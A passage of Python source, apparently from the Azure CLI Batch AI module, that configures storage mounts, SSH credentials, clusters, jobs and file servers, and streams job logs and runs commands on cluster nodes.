if ref.azure_file_url and AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER in ref.azure_file_url:
require_storage_account = True
ref.azure_file_url = ref.azure_file_url.replace(
AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER, storage_account_name)
if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
require_storage_account_key = True
ref.credentials.account_key = storage_account_key
if not ref.credentials and ref.account_name == storage_account_name:
require_storage_account_key = True
ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
if ref.account_name:
ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
# Patch parameters of blob file systems.
if result.azure_blob_file_systems:
for ref in result.azure_blob_file_systems:
# Replace placeholders
if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
require_storage_account = True
ref.account_name = storage_account_name
if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
require_storage_account_key = True
ref.credentials.account_key = storage_account_key
if not ref.credentials and ref.account_name == storage_account_name:
require_storage_account_key = True
ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
# Populate the rest of credentials based on the account name
if not ref.account_name:
raise CLIError('Ill-formed Azure Blob File System reference in the configuration file - no account '
'name provided.')
if ref.account_name:
ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
if require_storage_account and not storage_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if require_storage_account_key and not storage_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
return result
def _update_user_account_settings(params, admin_user_name, ssh_key, password):
"""Update account settings of cluster or file server creation parameters
:param models.ClusterCreateParameters or models.FileServerCreateParameters params: params to update
:param str or None admin_user_name: name of admin user to create.
:param str or None ssh_key: ssh public key value or path to the file containing the key.
:param str or None password: password.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(params)
if hasattr(result, 'user_account_settings'):
parent = result
else:
if result.ssh_configuration is None:
result.ssh_configuration = models.SshConfiguration(user_account_settings=None)
parent = result.ssh_configuration
if parent.user_account_settings is None:
parent.user_account_settings = models.UserAccountSettings(admin_user_name=None)
# Get effective user name, password and key trying them in the following order: provided via command line,
# provided in the config file, current user name and his default public ssh key.
effective_user_name = admin_user_name or parent.user_account_settings.admin_user_name or get_default_admin_username() # pylint: disable=line-too-long
effective_password = password or parent.user_account_settings.admin_user_password
# Use default ssh public key only if no password is configured.
effective_key = (ssh_key or parent.user_account_settings.admin_user_ssh_public_key or
(None if effective_password else _get_default_ssh_public_key_location()))
if effective_key:
if os.path.exists(os.path.expanduser(effective_key)):
with open(os.path.expanduser(effective_key)) as f:
effective_key = f.read()
try:
if effective_key and not keys.is_valid_ssh_rsa_public_key(effective_key):
raise CLIError('Incorrect ssh public key value.')
except Exception:
raise CLIError('Incorrect ssh public key value.')
parent.user_account_settings.admin_user_name = effective_user_name
parent.user_account_settings.admin_user_ssh_public_key = effective_key
parent.user_account_settings.admin_user_password = effective_password
if not parent.user_account_settings.admin_user_name:
raise CLIError('Please provide admin user name.')
if (not parent.user_account_settings.admin_user_ssh_public_key and
not parent.user_account_settings.admin_user_password):
raise CLIError('Please provide admin user password or ssh key.')
return result
def _add_nfs_to_mount_volumes(volumes, file_server_id, mount_path):
"""Adds NFS to the mount volumes.
:param models.MountVolumes or None volumes: existing mount volumes.
:param str file_server_id: resource id of the file server.
:param str mount_path: relative mount path for the file server.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('File server relative mount path cannot be empty.')
if result.file_servers is None:
result.file_servers = []
result.file_servers.append(models.FileServerReference(
relative_mount_path=mount_path,
file_server=models.ResourceId(id=file_server_id),
mount_options="rw"))
return result
def _get_azure_file_url(cli_ctx, account_name, azure_file_share):
"""Returns Azure File URL for the given account
:param str account_name: account name
:param str azure_file_share: name of the share
:return str: Azure File URL to be used in mount volumes
"""
return 'https://{0}.file.{1}/{2}'.format(account_name, cli_ctx.cloud.suffixes.storage_endpoint, azure_file_share)
def _add_azure_file_share_to_mount_volumes(cli_ctx, volumes, azure_file_share, mount_path, account_name=None,
account_key=None):
"""Add Azure File share to the mount volumes.
:param model.MountVolumes volumes: existing mount volumes.
:param str azure_file_share: name of the azure file share.
:param str mount_path: relative mount path for Azure File share.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('Azure File share relative mount path cannot be empty.')
if result.azure_file_shares is None:
result.azure_file_shares = []
effective_account_name, effective_account_key = _get_effective_storage_account_name_and_key(cli_ctx, account_name,
account_key)
if not effective_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if not effective_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
result.azure_file_shares.append(models.AzureFileShareReference(
relative_mount_path=mount_path,
account_name=effective_account_name,
azure_file_url=_get_azure_file_url(cli_ctx, effective_account_name, azure_file_share),
credentials=models.AzureStorageCredentialsInfo(account_key=effective_account_key)))
return result
def _add_azure_container_to_mount_volumes(cli_ctx, volumes, container_name, mount_path, account_name=None,
account_key=None):
"""Add Azure Storage container to the mount volumes.
:param model.MountVolumes: existing mount volumes.
:param str container_name: container name.
:param str mount_path: relative mount path for the container.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('Azure Storage Container relative mount path cannot be empty.')
if result.azure_blob_file_systems is None:
result.azure_blob_file_systems = []
storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(cli_ctx, account_name,
account_key)
if not storage_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if not storage_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
result.azure_blob_file_systems.append(models.AzureBlobFileSystemReference(
relative_mount_path=mount_path,
account_name=storage_account_name,
container_name=container_name,
credentials=models.AzureStorageCredentialsInfo(account_key=storage_account_key)))
return result
def _get_image_reference(image, custom_image):
"""Returns image reference for the given image and custom image.
:param str image or None: image alias or full spec.
:param str custom_image or None: resource id of the custom image.
:raise CLIError: if the image with given alias was not found.
"""
if custom_image and not image:
raise CLIError('You need to specify --image argument with information about the custom image')
if custom_image and not is_valid_resource_id(custom_image):
raise CLIError('Ill-formed custom image resource id')
if ':' in image:
# full image specification is provided
try:
publisher, offer, sku, version = image.split(':')
if not publisher:
raise CLIError('Image publisher must be provided in --image argument')
if not offer:
raise CLIError('Image offer must be provided in --image argument')
if not sku:
raise CLIError('Image sku must be provided in --image argument')
return models.ImageReference(
publisher=publisher,
offer=offer,
sku=sku,
version=version or None,
virtual_machine_image_id=custom_image
)
except ValueError:
raise CLIError('--image must have format "publisher:offer:sku:version" or "publisher:offer:sku:"')
# image alias is used
reference = None
for alias, value in SUPPORTED_IMAGE_ALIASES.items():
if alias.lower() == image.lower():
reference = value
if not reference:
raise CLIError('Unsupported image alias "{0}", supported aliases are {1}'.format(
image, ', '.join(SUPPORTED_IMAGE_ALIASES.keys())))
result = copy.deepcopy(reference)
result.virtual_machine_image_id = custom_image
return result
def _get_scale_settings(initial_count, min_count, max_count):
"""Returns scale settings for a cluster with given parameters"""
if not initial_count and not min_count and not max_count:
# Get from the config file
return None
if sum([1 if v is not None else 0 for v in (min_count, max_count)]) == 1:
raise CLIError('You need to either provide both min and max node counts or not provide any of them')
if min_count is not None and max_count is not None and min_count > max_count:
raise CLIError('Maximum nodes count must be greater or equal to minimum nodes count')
if min_count == max_count:
if min_count is None or initial_count == min_count:
return models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=initial_count))
if initial_count is None:
return models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=min_count)
)
return models.ScaleSettings(
auto_scale=models.AutoScaleSettings(
minimum_node_count=min_count,
maximum_node_count=max_count,
initial_node_count=initial_count or 0))
def _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes):
"""Updates cluster's nodes information.
:param models.ClusterCreateParameters params: cluster create parameters.
:param str or None image: image.
:param str or None custom_image: custom image resource id.
:param str or None vm_size: VM size.
:param str vm_priority: Priority.
:param int or None target: initial number of nodes.
:param int or None min_nodes: min number of nodes.
:param int or None max_nodes: max number of nodes.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(params)
if vm_size:
result.vm_size = vm_size
if not result.vm_size:
raise CLIError('Please provide VM size')
if vm_priority:
result.vm_priority = vm_priority
if image or custom_image:
result.virtual_machine_configuration = models.VirtualMachineConfiguration(
image_reference=_get_image_reference(image, custom_image))
scale_settings = _get_scale_settings(target, min_nodes, max_nodes)
if scale_settings:
result.scale_settings = scale_settings
if not result.scale_settings or (not result.scale_settings.manual and not result.scale_settings.auto_scale):
raise CLIError('Please provide scale setting for the cluster via command line or configuration file')
return result
def _get_auto_storage_resource_group():
return AUTO_STORAGE_RESOURCE_GROUP
def _configure_auto_storage(cli_ctx, location):
"""Configures auto storage account for the cluster
:param str location: location for the auto-storage account.
:return (str, str): a tuple with auto storage account name and key.
"""
from azure.mgmt.resource.resources.models import ResourceGroup
BlockBlobService, FileService = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
'blob#BlockBlobService', 'file#FileService')
resource_group = _get_auto_storage_resource_group()
resource_client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
if resource_client.resource_groups.check_existence(resource_group):
logger.warning('BatchAI will use existing %s resource group for auto-storage account',
resource_group)
else:
logger.warning('Creating %s resource group for auto-storage account', resource_group)
resource_client.resource_groups.create_or_update(
resource_group, ResourceGroup(location=location))
storage_client = _get_storage_management_client(cli_ctx)
account = None
for a in storage_client.storage_accounts.list_by_resource_group(resource_group):
if a.primary_location == location.lower().replace(' ', ''):
account = a.name
logger.warning('Using existing %s storage account as an auto-storage account', account)
break
if account is None:
account = _create_auto_storage_account(storage_client, resource_group, location)
logger.warning('Created auto storage account %s', account)
key = _get_storage_account_key(cli_ctx, account, None)
file_service = FileService(account, key)
file_service.create_share(AUTO_STORAGE_SHARE_NAME, fail_on_exist=False)
blob_service = BlockBlobService(account, key)
blob_service.create_container(AUTO_STORAGE_CONTAINER_NAME, fail_on_exist=False)
return account, key
def _generate_auto_storage_account_name():
"""Generates unique name for auto storage account"""
characters = list(string.ascii_lowercase * 12)
shuffle(characters)
return AUTO_STORAGE_ACCOUNT_PREFIX + ''.join(characters[:12])
def _create_auto_storage_account(storage_client, resource_group, location):
"""Creates new auto storage account in the given resource group and location
:param StorageManagementClient storage_client: storage client.
:param str resource_group: name of the resource group.
:param str location: location.
:return str: name of the created storage account.
"""
from azure.mgmt.storage.models import Kind, Sku, SkuName
name = _generate_auto_storage_account_name()
check = storage_client.storage_accounts.check_name_availability(name)
while not check.name_available:
name = _generate_auto_storage_account_name()
check = storage_client.storage_accounts.check_name_availability(name).name_available
storage_client.storage_accounts.create(resource_group, name, {
'sku': Sku(name=SkuName.standard_lrs),
'kind': Kind.storage,
'location': location}).result()
return name
def _add_setup_task(cmd_line, output, cluster):
"""Adds a setup task with given command line and output destination to the cluster.
:param str cmd_line: node setup command line.
:param str output: output destination.
:param models.ClusterCreateParameters cluster: cluster creation parameters.
"""
if cmd_line is None:
return cluster
if output is None:
raise CLIError('--setup-task requires providing of --setup-task-output')
cluster = copy.deepcopy(cluster)
cluster.node_setup = cluster.node_setup or models.NodeSetup()
cluster.node_setup.setup_task = models.SetupTask(
command_line=cmd_line,
std_out_err_path_prefix=output,
run_elevated=False)
return cluster
def _generate_ssh_keys():
"""Generates ssh keys pair"""
private_key_path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa')
public_key_path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub')
keys.generate_ssh_keys(private_key_path, public_key_path)
logger.warning('Attempted to find or generate SSH key files id_rsa and id_rsa.pub under ~/.ssh to allow SSH access '
'to the nodes. If using machines without permanent storage, back up your keys to a safe location.')
def list_workspaces(client, resource_group=None):
if resource_group:
return client.list_by_resource_group(resource_group)
return client.list()
def create_workspace(cmd, client, resource_group, workspace_name, location=None):
location = location or _get_resource_group_location(cmd.cli_ctx, resource_group)
return client.create(resource_group, workspace_name, location).result()
def create_experiment(client, resource_group, workspace_name, experiment_name):
return client.create(resource_group, workspace_name, experiment_name).result()
def _get_effective_resource_parameters(name_or_id, resource_group, workspace):
"""Returns effective resource group, workspace and name for the given resource"""
if not name_or_id:
return None, None, None
if is_valid_resource_id(name_or_id):
parts = parse_resource_id(name_or_id)
return parts['resource_group'], parts['name'], parts['resource_name']
return resource_group, workspace, name_or_id
def create_cluster(cmd, client, # pylint: disable=too-many-locals
resource_group, workspace_name, cluster_name, json_file=None, user_name=None,
ssh_key=None, password=None, generate_ssh_keys=None, image=None, custom_image=None,
use_auto_storage=False, vm_size=None, vm_priority=None, target=None, min_nodes=None,
max_nodes=None, subnet=None, nfs=None, nfs_mount_path='nfs', azure_file_share=None,
afs_mount_path='afs', container_name=None, container_mount_path='bfs', account_name=None,
account_key=None, setup_task=None, setup_task_output=None):
if generate_ssh_keys:
_generate_ssh_keys()
if ssh_key is None:
ssh_key = _get_default_ssh_public_key_location()
_ensure_resource_not_exist(client.clusters, resource_group, workspace_name, cluster_name)
nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
nfs, resource_group, workspace_name)
_ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name)
if json_file:
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('ClusterCreateParameters', json_obj)
else:
# noinspection PyTypeChecker
params = models.ClusterCreateParameters(vm_size=None, user_account_settings=None)
if params.node_setup:
params.node_setup.mount_volumes = _patch_mount_volumes(
cmd.cli_ctx, params.node_setup.mount_volumes, account_name, account_key)
params = _update_user_account_settings(params, user_name, ssh_key, password)
params = _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes)
if nfs_name or azure_file_share or container_name:
params.node_setup = params.node_setup or models.NodeSetup()
mount_volumes = params.node_setup.mount_volumes if params.node_setup else None
if nfs_name:
file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
if azure_file_share:
mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
afs_mount_path, account_name, account_key)
if container_name:
mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
container_mount_path, account_name, account_key)
if use_auto_storage:
auto_storage_account, auto_storage_key = _configure_auto_storage(
cmd.cli_ctx, _get_workspace_location(client, resource_group, workspace_name))
mount_volumes = _add_azure_file_share_to_mount_volumes(
cmd.cli_ctx, mount_volumes, AUTO_STORAGE_SHARE_NAME, AUTO_STORAGE_SHARE_PATH,
auto_storage_account, auto_storage_key)
mount_volumes = _add_azure_container_to_mount_volumes(
cmd.cli_ctx, mount_volumes, AUTO_STORAGE_CONTAINER_NAME, AUTO_STORAGE_CONTAINER_PATH,
auto_storage_account, auto_storage_key)
if mount_volumes:
if params.node_setup is None:
params.node_setup = models.NodeSetup()
params.node_setup.mount_volumes = mount_volumes
if subnet:
params.subnet = models.ResourceId(id=subnet)
if setup_task:
params = _add_setup_task(setup_task, setup_task_output, params)
return client.clusters.create(resource_group, workspace_name, cluster_name, params)
def list_clusters(client, resource_group, workspace_name):
return list(client.list_by_workspace(resource_group, workspace_name))
def resize_cluster(client, resource_group, workspace_name, cluster_name, target):
return client.update(resource_group, workspace_name, cluster_name, scale_settings=models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=target)))
def set_cluster_auto_scale_parameters(client, resource_group, workspace_name, cluster_name, min_nodes, max_nodes):
return client.update(resource_group, workspace_name, cluster_name, scale_settings=models.ScaleSettings(
auto_scale=models.AutoScaleSettings(minimum_node_count=min_nodes, maximum_node_count=max_nodes)))
def _is_on_mount_point(path, mount_path):
"""Checks if path is on mount_path"""
path = os.path.normpath(path).replace('\\', '/')
mount_path = os.path.normpath(mount_path).replace('\\', '/')
return path == mount_path or os.path.commonprefix([path, mount_path + '/']) == mount_path + '/'
def list_node_setup_files(cmd, client, resource_group, workspace_name, cluster_name, path='.',
expiry=DEFAULT_URL_EXPIRY_MIN):
cluster = client.get(resource_group, workspace_name, cluster_name) # type: models.Cluster
return _list_node_setup_files_for_cluster(cmd.cli_ctx, cluster, path, expiry)
def _list_node_setup_files_for_cluster(cli_ctx, cluster, path, expiry):
"""Lists node setup task's log files for the given cluster.
:param models.Cluster cluster: the cluster.
:param str path: relative path under cluster node setup task's output directory.
:param int expiry: time in seconds for how long generated SASes will remain valid.
"""
unsupported_location = 'List files is supported only for clusters with startup task configure to store its ' \
'output on Azure File Share or Azure Blob Container'
if cluster.node_setup is None or cluster.node_setup.setup_task is None:
# Nothing to check or return if there is no setup task.
return []
prefix = cluster.node_setup.setup_task.std_out_err_path_prefix
if not _is_on_mount_point(prefix, '$AZ_BATCHAI_MOUNT_ROOT'):
# The stdouterr directory must be on $AZ_BATCHAI_MOUNT_ROOT
raise CLIError(unsupported_location)
suffix = cluster.node_setup.setup_task.std_out_err_path_suffix
if not suffix:
# Clusters created with older API version do not report the path suffix, so we cannot find their files.
raise CLIError('List files is not supported for this cluster')
relative_mount_path = prefix[len('$AZ_BATCHAI_MOUNT_ROOT/'):]
if cluster.node_setup.mount_volumes is None:
# If nothing is mounted, the files were stored somewhere else and we cannot find them.
raise CLIError(unsupported_location)
# try mounted Azure file shares
for afs in cluster.node_setup.mount_volumes.azure_file_shares or []:
if _is_on_mount_point(relative_mount_path, afs.relative_mount_path):
return _get_files_from_afs(cli_ctx, afs, os.path.join(suffix, path), expiry)
# try mounted blob containers
for bfs in cluster.node_setup.mount_volumes.azure_blob_file_systems or []:
if _is_on_mount_point(relative_mount_path, bfs.relative_mount_path):
return _get_files_from_bfs(cli_ctx, bfs, os.path.join(suffix, path), expiry)
# the folder on some other file system or on local disk
raise CLIError(unsupported_location)
def _get_files_from_bfs(cli_ctx, bfs, path, expiry):
"""Returns a list of files and directories under given path on mounted blob container.
:param models.AzureBlobFileSystemReference bfs: blob file system reference.
:param str path: path to list files from.
:param int expiry: SAS expiration time in minutes.
"""
from azure.storage.blob import BlockBlobService
from azure.storage.blob.models import Blob, BlobPermissions
result = []
service = BlockBlobService(bfs.account_name, _get_storage_account_key(cli_ctx, bfs.account_name, None))
effective_path = _get_path_for_storage(path)
folders = set()
for b in service.list_blobs(bfs.container_name, effective_path + '/', delimiter='/'):
if isinstance(b, Blob):
name = os.path.basename(b.name)
sas = service.generate_blob_shared_access_signature(
bfs.container_name, b.name, BlobPermissions(read=True),
expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
result.append(
LogFile(
name, service.make_blob_url(bfs.container_name, b.name, 'https', sas),
False, b.properties.content_length))
else:
name = b.name.split('/')[-2]
folders.add(name)
result.append(LogFile(name, None, True, None))
result = [f for f in result if f.is_directory or f.name not in folders]
return result
def _get_path_for_storage(path):
"""Returns a path in format acceptable for passing to storage"""
result = os.path.normpath(path).replace('\\', '/')
if result.endswith('/.'):
result = result[:-2]
return result
def _get_files_from_afs(cli_ctx, afs, path, expiry):
"""Returns a list of files and directories under given path on mounted Azure File share.
:param models.AzureFileShareReference afs: Azure file share reference.
:param str path: path to list files from.
:param int expiry: SAS expiration time in minutes.
"""
FileService, File, FilePermissions = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
'file#FileService', 'file.models#File', 'file.models#FilePermissions')
result = []
service = FileService(afs.account_name, _get_storage_account_key(cli_ctx, afs.account_name, None))
share_name = afs.azure_file_url.split('/')[-1]
effective_path = _get_path_for_storage(path)
if not service.exists(share_name, effective_path):
return result
for f in service.list_directories_and_files(share_name, effective_path):
if isinstance(f, File):
sas = service.generate_file_shared_access_signature(
share_name, effective_path, f.name, permission=FilePermissions(read=True),
expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
result.append(
LogFile(
f.name, service.make_file_url(share_name, effective_path, f.name, 'https', sas),
False, f.properties.content_length))
else:
result.append(LogFile(f.name, None, True, None))
return result
def create_job(cmd, # pylint: disable=too-many-locals
client, resource_group, workspace_name, experiment_name, job_name, json_file,
cluster, nfs=None, nfs_mount_path='nfs', azure_file_share=None, afs_mount_path='afs',
container_name=None, container_mount_path='bfs', account_name=None, account_key=None):
_ensure_job_not_exist(client.jobs, resource_group, workspace_name, experiment_name, job_name)
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('JobCreateParameters', json_obj) # type: models.JobCreateParameters
# If cluster is not configured via command line, let's get it from the config file.
if not cluster:
cluster = params.cluster.id
if not cluster:
raise CLIError('Please provide cluster information via command line or configuration file.')
cluster_resource_group, cluster_workspace, cluster_name = _get_effective_resource_parameters(
cluster, resource_group, workspace_name)
# Check presence of the cluster.
existing_cluster = client.clusters.get(cluster_resource_group, cluster_workspace, cluster_name)
params.cluster = models.ResourceId(id=existing_cluster.id)
# Update credentials and other parameters for mount volumes configured via config file.
if params.mount_volumes:
params.mount_volumes = _patch_mount_volumes(
cmd.cli_ctx, params.mount_volumes, account_name, account_key)
# Create mount volumes if required
if nfs or azure_file_share or container_name:
params.mount_volumes = params.mount_volumes or models.MountVolumes()
mount_volumes = params.mount_volumes
# Add NFS into mount volumes
if nfs:
nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
nfs, resource_group, workspace_name)
file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
# Add Azure File Share into mount volumes.
if azure_file_share:
mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
afs_mount_path, account_name, account_key)
# Add Blob Container into mount volumes.
if container_name:
mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
container_mount_path, account_name, account_key)
params.mount_volumes = mount_volumes
return client.jobs.create(resource_group, workspace_name, experiment_name, job_name, params)
def list_files(client, resource_group, workspace_name, experiment_name, job_name,
output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.',
expiry=DEFAULT_URL_EXPIRY_MIN):
options = models.JobsListOutputFilesOptions(
outputdirectoryid=output_directory_id,
directory=path,
linkexpiryinminutes=expiry)
return list(client.list_output_files(resource_group, workspace_name, experiment_name, job_name, options))
def sigint_handler(*_):
# Some libs do not handle KeyboardInterrupt nicely and print junk
# messages. So, let's just exit without any cleanup.
# noinspection PyProtectedMember
os._exit(0) # pylint: disable=protected-access
def tail_file(client, resource_group, workspace_name, experiment_name, job_name, file_name,
output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.'):
signal.signal(signal.SIGINT, sigint_handler)
url = None
# Wait until the file become available.
reported_absence_of_file = False
while url is None:
files = list_files(client, resource_group, workspace_name, experiment_name, job_name, output_directory_id, path)
for f in files:
if f.name == file_name:
url = f.download_url
logger.warning('File found with URL "%s". Start streaming', url)
break
if url is None:
job = client.get(resource_group, workspace_name, experiment_name, job_name)
if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
break
if not reported_absence_of_file:
logger.warning('The file "%s" not found. Waiting for the job to generate it.', file_name)
reported_absence_of_file = True
time.sleep(1)
if url is None:
logger.warning('The file "%s" not found for the completed job.', file_name)
return
# Stream the file
downloaded = 0
while True:
r = requests.get(url, headers={'Range': 'bytes={0}-'.format(downloaded)})
if int(r.status_code / 100) == 2:
downloaded += len(r.content)
print(r.content.decode(), end='')
job = client.get(resource_group, workspace_name, experiment_name, job_name)
if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
break
time.sleep(1)
def wait_for_job_completion(client, resource_group, workspace_name, experiment_name, job_name, check_interval_sec=15):
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name) # type: models.Job
logger.warning('Job submitted at %s', str(job.creation_time))
last_state = None
reported_job_start_time = False
while True:
info = job.execution_info # type: models.JobPropertiesExecutionInfo
if info and not reported_job_start_time:
logger.warning('Job started execution at %s', str(info.start_time))
reported_job_start_time = True
if job.execution_state != last_state:
logger.warning('Job state: %s', job.execution_state)
last_state = job.execution_state
if job.execution_state == models.ExecutionState.succeeded:
logger.warning('Job completed at %s; execution took %s', str(info.end_time),
str(info.end_time - info.start_time))
return
if job.execution_state == models.ExecutionState.failed:
_log_failed_job(resource_group, job)
sys.exit(-1)
time.sleep(check_interval_sec)
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name)
def _log_failed_job(resource_group, job):
"""Logs information about failed job
:param str resource_group: resource group name
:param models.Job job: failed job.
"""
logger.warning('The job "%s" in resource group "%s" failed.', job.name, resource_group)
info = job.execution_info # type: models.JobPropertiesExecutionInfo
if info:
logger.warning('Job failed with exit code %d at %s; execution took %s', info.exit_code,
str(info.end_time), str(info.end_time - info.start_time))
errors = info.errors
if errors:
for e in errors:
details = '<none>'
if e.details:
details = '\n' + '\n'.join(['{0}: {1}'.format(d.name, d.value) for d in e.details])
logger.warning('Error message: %s\nDetails:\n %s', e.message, details)
sys.exit(info.exit_code)
logger.warning('Failed job has no execution info')
def create_file_server(client, resource_group, workspace, file_server_name, json_file=None, vm_size=None,
user_name=None, ssh_key=None, password=None, generate_ssh_keys=None, disk_count=None,
disk_size=None, caching_type=None, storage_sku=None, subnet=None, raw=False):
if generate_ssh_keys:
_generate_ssh_keys()
if ssh_key is None:
ssh_key = _get_default_ssh_public_key_location()
_ensure_resource_not_exist(client.file_servers, resource_group, workspace, file_server_name)
if json_file:
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('FileServerCreateParameters', json_obj)
else:
# noinspection PyTypeChecker
params = models.FileServerCreateParameters(location=None, vm_size=None, ssh_configuration=None, data_disks=None)
params = _update_user_account_settings(params, user_name, ssh_key, password)
params.location = _get_workspace_location(client, resource_group, workspace)
if not params.data_disks:
# noinspection PyTypeChecker
params.data_disks = models.DataDisks(disk_size_in_gb=None, disk_count=None, storage_account_type=None)
if disk_size:
params.data_disks.disk_size_in_gb = disk_size
if not params.data_disks.disk_size_in_gb:
raise CLIError('Please provide disk size in Gb.')
if disk_count:
params.data_disks.disk_count = disk_count
if not params.data_disks.disk_count:
raise CLIError('Please provide number of data disks (at least one disk is required).')
if caching_type:
params.data_disks.caching_type = caching_type
if storage_sku:
params.data_disks.storage_account_type = storage_sku
if not params.data_disks.storage_account_type:
raise CLIError('Please provide storage account type (storage sku).')
if vm_size:
params.vm_size = vm_size
if not params.vm_size:
raise CLIError('Please provide VM size.')
if subnet:
if not is_valid_resource_id(subnet):
raise CLIError('Ill-formed subnet resource id')
params.subnet = models.ResourceId(id=subnet)
return client.file_servers.create(resource_group, workspace, file_server_name, params, raw=raw)
def list_file_servers(client, resource_group, workspace_name):
return client.list_by_workspace(resource_group, workspace_name)
def _get_available_local_port():
"""
Gets a random, available local port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # pylint: disable=no-member
s.bind(('', 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def _create_tunnel(remote_host, port, username, password, ssh_private_key, local_addresses, remote_addresses, func):
"""Creates a tunnel to the remote host and runs provided func under the tunnel.
:param str remote_host: ip or address of the remote host
:param int port: the ssh port number
:param str username: username to login under
:param str or None password: the user password
:param str or None ssh_private_key: the path to private ssh key
:param local_addresses: local addresses to be forwarded
:param remote_addresses: target addresses
:param func: a function to run on the remote host. The forwarding is stopped as soon as func completes execution.
"""
from sshtunnel import SSHTunnelForwarder
local_addresses = [(a[0], a[1] if a[1] != 0 else _get_available_local_port()) for a in local_addresses]
with SSHTunnelForwarder((remote_host, port),
ssh_username=username,
ssh_password=password,
ssh_pkey=ssh_private_key,
remote_bind_addresses=remote_addresses,
local_bind_addresses=local_addresses):
func()
def _ssh_exec(ip, port, cmdline, username, password, ssh_private_key):
"""Executes the given cmdline on the provided host under given credentials.
:param str ip: id address
:param int port: the ssh port number
:param str cmdline: command line to execute
:param str username: username to login
:param str or None password: the user password
:param str or None ssh_private_key: the path to the private ssh key
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, port, username, password=password, key_filename=ssh_private_key)
transport = ssh.get_transport()
transport.set_keepalive(15)
_, out, err = ssh.exec_command('bash -ilc "{}"'.format(cmdline), get_pty=True)
output_lock = threading.Lock()
def _worker(s):
for l in s:
with output_lock:
print(l, end='')
threads = [threading.Thread(target=_worker, args=(s,)) for s in [out, err]]
for t in threads:
t.start()
# On Windows thread.join() call prevents the master thread from handling Ctrl-C, so we are joining with timeout.
while True:
for t in threads:
t.join(timeout=1)
if not t.is_alive():
return
def exec_on_node(client, resource_group, workspace_name, cluster_name, node_id=None, ports=None, cmdline=None,
password=None, ssh_private_key=None):
from sshtunnel import BaseSSHTunnelForwarderError
if not any((cmdline, ports)):
return
ip, port = None, None
if node_id:
for n in client.list_remote_login_information(resource_group, workspace_name, cluster_name):
if n.node_id == node_id:
ip = n.ip_address
port = int(n.port)
if ip is None:
raise CLIError('Cannot find a node with id={0}'.format(node_id))
else:
nodes = list(client.list_remote_login_information(resource_group, workspace_name, cluster_name))
if not nodes:
raise CLIError('No nodes available in the cluster')
ip = nodes[0].ip_address
port = int(nodes[0].port)
